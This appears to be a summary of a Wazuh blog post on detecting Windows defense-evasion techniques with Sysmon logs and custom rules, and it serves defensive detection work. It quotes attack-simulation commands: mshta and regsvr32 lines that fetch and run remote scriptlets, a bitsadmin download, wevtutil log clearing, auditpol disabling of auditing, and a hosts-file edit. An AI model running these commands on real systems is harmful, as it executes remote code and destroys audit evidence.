Threat Research

Detecting defense evasion techniques with Wazuh

Wazuh
Detecting defense evasion techniques with Wazuh

Keypoints

  • Wazuh can detect defense evasion techniques on Windows endpoints by ingesting Sysmon event logs and using built-in and custom rules.
  • Infrastructure for testing includes a Wazuh OVA (4.12.0) and a Windows 11 endpoint with the Wazuh agent enrolled.
  • Custom detection rules for techniques such as BITS Jobs, MSHTA, and Regsvr32 are provided as XML rule snippets and assigned rule IDs (e.g., 110001–110003).
  • Built-in Wazuh rules detect tampering with audit policy and log clearing (e.g., rule IDs 60112, 63103, 63104) and account/group changes (60109, 60110, 60111, 60154, 60160).
  • Attack simulations use built-in Windows tools and Atomic Red Team payloads to emulate T1197, T1562.002, T1070.001, T1070.009, T1218.005, T1218.010, and rootkit-like behavior modifying hosts file.
  • Rootcheck module in Wazuh is used to detect rootkit-like changes and runs scans by default every 12 hours (triggerable by restarting the agent).
  • The post provides remediation or rollback commands to restore audit policies, event logs, created user accounts, hosts file, and to remove simulated downloads after testing.

MITRE Techniques

  • [T1197 ] BITS Jobs – Abused Windows Background Intelligent Transfer Service to download and execute payloads. Quote: ‘bitsadmin.exe /transfer /Download /priority … %localappdata%Tempbitsdownload.txt’
  • [T1562.002 ] Impair Defenses: Disable Windows Event Logging – Used auditpol to disable Windows auditing to prevent logging of authentication events. Quote: ‘auditpol /set /category:”Account Logon” /success:disable /failure:disable’
  • [T1070.001 ] Indicator Removal: Clear Windows Event Logs – Used wevtutil to clear System and Security event logs to hide activity. Quote: ‘wevtutil cl System; wevtutil cl Security’
  • [T1070.009 ] Indicator Removal: Clear Persistence – Created and then deleted a local user to remove persistence artifacts. Quote: ‘New-LocalUser -Name “T1070” … Remove-LocalUser -Name “T1070″‘
  • [T1218.005 ] System Binary Proxy Execution: Mshta – Executed a remote script via mshta.exe to run remote payloads, launching calc.exe in the simulation. Quote: ‘mshta.exe javascript:a=(GetObject(”script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct”)).Exec();close();’
  • [T1218.010 ] System Binary Proxy Execution: Regsvr32 – Used regsvr32.exe to execute a remote COM scriptlet from a URL, executing calc.exe in the simulation. Quote: ‘regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll’
  • [T1014 ] Rootkit – Simulated rootkit-like behavior by modifying the hosts file to block security updates, detected via Rootcheck. Quote: ‘Add-Content -Path “C:WindowsSystem32driversetchosts” -Value “`n127.0.0.1 microsoft.com”‘

Indicators of Compromise

  • [File names ] Simulated payloads and artifacts – bitsdownload.txt (downloaded via BITS), RegSvr32.sct and mshta.sct (remote scriptlets used in simulations)
  • [Command lines ] Suspicious command usage – examples include bitsadmin.exe /transfer /Download …, mshta.exe javascript:… , regsvr32.exe /s /u /i:… scrobj.dll
  • [Log/event IDs ] Wazuh detection rule IDs and Windows event sources – rule.id 110001,110002,110003, 60112,63103,63104, 60109-60111,60154,60160, and 513 (Rootcheck alert)
  • [Domains/URLs ] Remote scriptlet URLs used in simulations – raw.githubusercontent.com/redcanaryco/atomic-red-team/… (Atomic Red Team resources)

Read more: https://wazuh.com/blog/detecting-defense-evasion-techniques-with-wazuh/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint